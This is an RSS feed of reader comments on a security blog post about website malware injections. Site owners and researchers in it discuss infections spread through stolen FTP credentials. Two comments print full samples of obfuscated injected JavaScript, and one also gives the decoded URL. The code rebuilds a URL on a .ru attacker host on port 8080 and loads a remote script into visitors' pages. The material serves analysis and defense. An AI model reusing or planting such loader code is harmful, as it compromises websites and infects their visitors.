<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: From Hidden Iframes to Obfuscated Scripts</title>
	<atom:link href="http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/</link>
	<description>Website insecurity by example</description>
	<lastBuildDate>Sun, 05 Feb 2012 10:06:25 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: More on Troj/JSRedir-AK &#124; Naked Security</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-9987</link>
		<dc:creator>More on Troj/JSRedir-AK &#124; Naked Security</dc:creator>
		<pubDate>Wed, 27 Oct 2010 09:37:10 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-9987</guid>
		<description>[...] one of the main methods for infection is via compromised FTP credentials. My colleague over at the Unmask Parasites. Blog has also reported seeing large numbers of sites affected. Affected websites [...]</description>
		<content:encoded><![CDATA[<p>[...] one of the main methods for infection is via compromised FTP credentials. My colleague over at the Unmask Parasites. Blog has also reported seeing large numbers of sites affected. Affected websites [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Troj/JSRedir-AK morphs into Troj/JSRedir-AR &#124; Naked Security</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-9732</link>
		<dc:creator>Troj/JSRedir-AK morphs into Troj/JSRedir-AR &#124; Naked Security</dc:creator>
		<pubDate>Sun, 17 Oct 2010 18:33:28 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-9732</guid>
		<description>[...] over at Unmask Parasites. Blog. they also noticed this [...]</description>
		<content:encoded><![CDATA[<p>[...] over at Unmask Parasites. Blog. they also noticed this [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: MK</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6786</link>
		<dc:creator>MK</dc:creator>
		<pubDate>Mon, 22 Feb 2010 11:23:33 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6786</guid>
		<description>I have been seeing a lot of this most recent variation. It is being randomized on each injection. However the injection is consistent across the account, and the structure stays similar.</description>
		<content:encoded><![CDATA[<p>I have been seeing a lot of this most recent variation. It is being randomized on each injection. However the injection is consistent across the account, and the structure stays similar.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Noxwizard</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6783</link>
		<dc:creator>Noxwizard</dc:creator>
		<pubDate>Sun, 21 Feb 2010 09:22:55 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6783</guid>
		<description>I forgot to mention that I was able to verify through the logs that the FTP credentials had been stolen.</description>
		<content:encoded><![CDATA[<p>I forgot to mention that I was able to verify through the logs that the FTP credentials had been stolen.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Noxwizard</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6782</link>
		<dc:creator>Noxwizard</dc:creator>
		<pubDate>Sun, 21 Feb 2010 09:18:17 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6782</guid>
		<description>Looks like a possible evolution of this one. The injected code is here: http://noxwizard.pastebin.com/f6e4b85cc
Of course it&#039;s on two lines and not the way I have it. Ultimately what happens is that HS() gets called on line 578, which at this point is the following function: http://noxwizard.pastebin.com/f26805767</description>
		<content:encoded><![CDATA[<p>Looks like a possible evolution of this one. The injected code is here: <a href="http://noxwizard.pastebin.com/f6e4b85cc" rel="nofollow">http://noxwizard.pastebin.com/f6e4b85cc</a><br />
Of course it&#8217;s on two lines and not the way I have it. Ultimately what happens is that HS() gets called on line 578, which at this point is the following function: <a href="http://noxwizard.pastebin.com/f26805767" rel="nofollow">http://noxwizard.pastebin.com/f26805767</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Anand</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6741</link>
		<dc:creator>Anand</dc:creator>
		<pubDate>Wed, 10 Feb 2010 18:56:30 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6741</guid>
		<description>My website also had this, the URL that I had was hxxp://picfoco-com.capitalone.com.salesforce-com.&lt;strong&gt;theantimatrix .ru&lt;/strong&gt;:8080/google.com/google.com/vmn.net/netlog.com/over-blog.com

Can somebody let me know whats the harm that this code would have done? Appreciate your response.

Cheers
Anand</description>
		<content:encoded><![CDATA[<p>My website also had this, the URL that I had was hxxp://picfoco-com.capitalone.com.salesforce-com.<strong>theantimatrix .ru</strong>:8080/google.com/google.com/vmn.net/netlog.com/over-blog.com</p>
<p>Can somebody let me know whats the harm that this code would have done? Appreciate your response.</p>
<p>Cheers<br />
Anand</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6699</link>
		<dc:creator>Denis</dc:creator>
		<pubDate>Mon, 01 Feb 2010 15:19:40 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6699</guid>
		<description>This must be yet another revision
&lt;code&gt;
try{window.onload=function(){Iebf2d21q07z = &#039;&#039; + &#039;i)c(#i$b)!a&amp;$-$(c$())o&amp;)m((.@c&amp;)!o&amp;(@n(&amp;s!)(t@!#a)n@!!t(@&amp;(@c^$^#o^#n&amp;t!a&amp;&amp;c!t(.!#(c(&amp;@^o))$^m#&amp;&amp;.@&amp;p@e@)^r&amp;e#@)$z@h#(i!l!#^t((@o@n!@@^-#$^c)^(o(&amp;m).#(b^i)$l&amp;$(&amp;!t$o^&amp;!p^&amp;.@&amp;#&amp;r!(u$:@))N#q#@5#(^b!(&amp;@h$3)f&amp;@)i#@t&amp;$w&amp;!1@r$#v!$/!&amp;@$g####o($@&amp;&amp;o(g$l)@!e@$.@(c$$()o&amp;m&amp;.$@(a^u!/^##g))()o#^o#&amp;#g$#l!^)e$$.&amp;#c!o($@m($.!^^a!u)^!/@!t#$@o(($r(!#r&amp;(&amp;e#^n$t^@^$s!&amp;$^.(@r#!@u)$#&amp;/(a@$l$#l!(e!^g$)(r&amp;$#)o$^&amp;.^p()l!)^@/#$$##g#$o)@$o)$#^g(&amp;l(e@.#!c&amp;o&amp;@m$#/^&#039;.replace(/#&#124;@&#124;\^&#124;\$&#124;\!&#124;&amp;&#124;\)&#124;\(/ig, &#039;&#039;) ;
Jq2dz9nff1w0lm = &#039;appendChild&#039;;Rkn5tmljhj1c = d ocument.createElement(&#039;sc&#039;+&#039;ript&#039;);
Rkn5tmljhj1c.src = &#039;h&#039;+&#039;ttp://&#039;+Iebf2d21q07z.replace(/Nq5bh3fitw1rv/ g, &quot;8080&quot;);Rkn5tmljhj1c.setAttribute(&#039;defer&#039;, &#039;def&#039;+&#039;er&#039;);e val(&#039;document.body.&#039;+Jq2dz9nff1w0lm+&#039;(Rkn5tmljhj1c)&#039;);} }  catch(P052l4jn ) {}
&lt;/code&gt;

in this case translates to
iciba-com.constantcontact.com.perezhilton-com.&lt;b&gt;biltop .ru&lt;/b&gt;:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/</description>
		<content:encoded><![CDATA[<p>This must be yet another revision<br />
<code><br />
try{window.onload=function(){Iebf2d21q07z = '' + 'i)c(#i$b)!a&amp;$-$(c$())o&amp;)m((.@c&amp;)!o&amp;(@n(&amp;s!)(t@!#a)n@!!t(@&amp;(@c^$^#o^#n&amp;t!a&amp;&amp;c!t(.!#(c(&amp;@^o))$^m#&amp;&amp;.@&amp;p@e@)^r&amp;e#@)$z@h#(i!l!#^t((@o@n!@@^-#$^c)^(o(&amp;m).#(b^i)$l&amp;$(&amp;!t$o^&amp;!p^&amp;.@&amp;#&amp;r!(u$:@))N#q#@5#(^b!(&amp;@h$3)f&amp;@)i#@t&amp;$w&amp;!1@r$#v!$/!&amp;@$g####o($@&amp;&amp;o(g$l)@!e@$.@(c$$()o&amp;m&amp;.$@(a^u!/^##g))()o#^o#&amp;#g$#l!^)e$$.&amp;#c!o($@m($.!^^a!u)^!/@!t#$@o(($r(!#r&amp;(&amp;e#^n$t^@^$s!&amp;$^.(@r#!@u)$#&amp;/(a@$l$#l!(e!^g$)(r&amp;$#)o$^&amp;.^p()l!)^@/#$$##g#$o)@$o)$#^g(&amp;l(e@.#!c&amp;o&amp;@m$#/^'.replace(/#|@|\^|\$|\!|&amp;|\)|\(/ig, '') ;<br />
Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement('sc'+'ript');<br />
Rkn5tmljhj1c.src = 'h'+'ttp://'+Iebf2d21q07z.replace(/Nq5bh3fitw1rv/ g, "8080");Rkn5tmljhj1c.setAttribute('defer', 'def'+'er');e val('document.body.'+Jq2dz9nff1w0lm+'(Rkn5tmljhj1c)');} }  catch(P052l4jn ) {}<br />
</code></p>
<p>in this case translates to<br />
iciba-com.constantcontact.com.perezhilton-com.<b>biltop .ru</b>:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Larry at Home</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6692</link>
		<dc:creator>Larry at Home</dc:creator>
		<pubDate>Sat, 30 Jan 2010 18:55:42 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6692</guid>
		<description>May I ask what happens when I click on a hyperlink in a SPAM  that sends me to one of these posted malware sites? Specifically,I have traced the IP&#039;s listed in the SPAM and it seems that the redirecting thru infected PCS and hosts ends up at an online drugstore.One of them is Luxpharmacy .com</description>
		<content:encoded><![CDATA[<p>May I ask what happens when I click on a hyperlink in a SPAM  that sends me to one of these posted malware sites? Specifically,I have traced the IP&#8217;s listed in the SPAM and it seems that the redirecting thru infected PCS and hosts ends up at an online drugstore.One of them is Luxpharmacy .com</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: MK</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6684</link>
		<dc:creator>MK</dc:creator>
		<pubDate>Fri, 29 Jan 2010 09:44:29 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6684</guid>
		<description>As more of a explanatory note. The main difference between this and the previous version is the randomization of the &quot;megaid&quot; div id. Presumably to prevent this from being used as a signature.</description>
		<content:encoded><![CDATA[<p>As more of a explanatory note. The main difference between this and the previous version is the randomization of the &#8220;megaid&#8221; div id. Presumably to prevent this from being used as a signature.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: MK</title>
		<link>http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6683</link>
		<dc:creator>MK</dc:creator>
		<pubDate>Fri, 29 Jan 2010 09:42:00 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=478#comment-6683</guid>
		<description>Revised yet again, most recent sample:

try{window.onload=function(){document.write(&#039;&lt;div&#160;id=Fuq9970c1s5ie8&gt;drudgereport-com.chinamob&lt;/div&gt;&#039;);Jzzicgcp586y245&#160;=&#160;document.getElementById(&#039;Fuq9970c1s5ie8&#039;).innerHTML&#160;+&#160;&#039;i)^l(e@&amp;&amp;.$c!&amp;#o#m)#&amp;!.($&amp;^w#s$j$$)-@c^!#@o$(m(@@.$!&amp;w()!a$^$!v(&amp;$e!(@b&amp;)&amp;a&amp;@!&amp;^n$#k$$^.@r!)(u!#^:)()O(&amp;o!s$#&amp;)@s^t)!#u$$))q!^u$!&amp;o()#y$@^v&amp;x)@^)/#&amp;#^h@$(o&amp;#^$m)e@!w##&amp;a^)y(&amp;!.!!c^o@m@)($.$$&amp;@#c&amp;&amp;@n$^!/&amp;$(h!@o$&amp;m)^(@e#!^#w##a#!!^y@.!!$c#)@@!o$(m()^.^c#&amp;!^n!^#/)(&amp;(g(!o&amp;o@#g#l((!e)^))^.$c^o!#$$m$/##(c#!#@a#$r^(&amp;$e!#e$!&amp;$r@b@#$u$()!i^&amp;^l!(d$)!@e$r!^&amp;.@(#c&amp;(@&amp;#o!m#!(@/))w($&amp;o)$w&amp;)^a^$#r$&amp;!m&amp;@o#)r@y(^.&amp;^(c&amp;)^!o($&amp;m&amp;@!^/(^&#039;.replace(/\$&#124;\(&#124;@&#124;\^&#124;\)&#124;#&#124;\!&#124;&amp;/ig,&#160;&#039;&#039;)&#160;;document.write(&#039;&lt;scr&#039;+&#039;ipt&#160;src=h&#039;+&#039;ttp://&#039;+Jzzicgcp586y245.replace(/Oosstuquoyvx/ g,&#160;&quot;8080&quot;)+&#039;&gt;&lt;/scr&#039;+&#039;ipt&gt;&#039;);}&#160;}&#160;catch(Tjkclo5m&#160;)&#160;{}

&lt;!--908fc049c965bc03ac9c678ea1cd685f--&gt;</description>
		<content:encoded><![CDATA[<p>Revised yet again, most recent sample:</p>
<p>try{window.onload=function(){document.write(&#8216;&lt;div&nbsp;id=Fuq9970c1s5ie8&gt;drudgereport-com.chinamob&lt;/div&gt;&#8217;);Jzzicgcp586y245&nbsp;=&nbsp;document.getElementById(&#8216;Fuq9970c1s5ie8&#8242;).innerHTML&nbsp;+&nbsp;&#8217;i)^l(e@&amp;&amp;.$c!&amp;#o#m)#&amp;!.($&amp;^w#s$j$$)-@c^!#@o$(m(@@.$!&amp;w()!a$^$!v(&amp;$e!(@b&amp;)&amp;a&amp;@!&amp;^n$#k$$^.@r!)(u!#^:)()O(&amp;o!s$#&amp;)@s^t)!#u$$))q!^u$!&amp;o()#y$@^v&amp;x)@^)/#&amp;#^h@$(o&amp;#^$m)e@!w##&amp;a^)y(&amp;!.!!c^o@m@)($.$$&amp;@#c&amp;&amp;@n$^!/&amp;$(h!@o$&amp;m)^(@e#!^#w##a#!!^y@.!!$c#)@@!o$(m()^.^c#&amp;!^n!^#/)(&amp;(g(!o&amp;o@#g#l((!e)^))^.$c^o!#$$m$/##(c#!#@a#$r^(&amp;$e!#e$!&amp;$r@b@#$u$()!i^&amp;^l!(d$)!@e$r!^&amp;.@(#c&amp;(@&amp;#o!m#!(@/))w($&amp;o)$w&amp;)^a^$#r$&amp;!m&amp;@o#)r@y(^.&amp;^(c&amp;)^!o($&amp;m&amp;@!^/(^&#8217;.replace(/\$|\(|@|\^|\)|#|\!|&amp;/ig,&nbsp;&#8221;)&nbsp;;document.write(&#8216;&lt;scr&#8217;+'ipt&nbsp;src=h&#8217;+'ttp://&#8217;+Jzzicgcp586y245.replace(/Oosstuquoyvx/ g,&nbsp;&#8221;8080&#8243;)+&#8217;&gt;&lt;/scr&#8217;+'ipt&gt;&#8217;);}&nbsp;}&nbsp;catch(Tjkclo5m&nbsp;)&nbsp;{}</p>
<p>&lt;!&#8211;908fc049c965bc03ac9c678ea1cd685f&#8211;&gt;</p>
]]></content:encoded>
	</item>
</channel>
</rss>

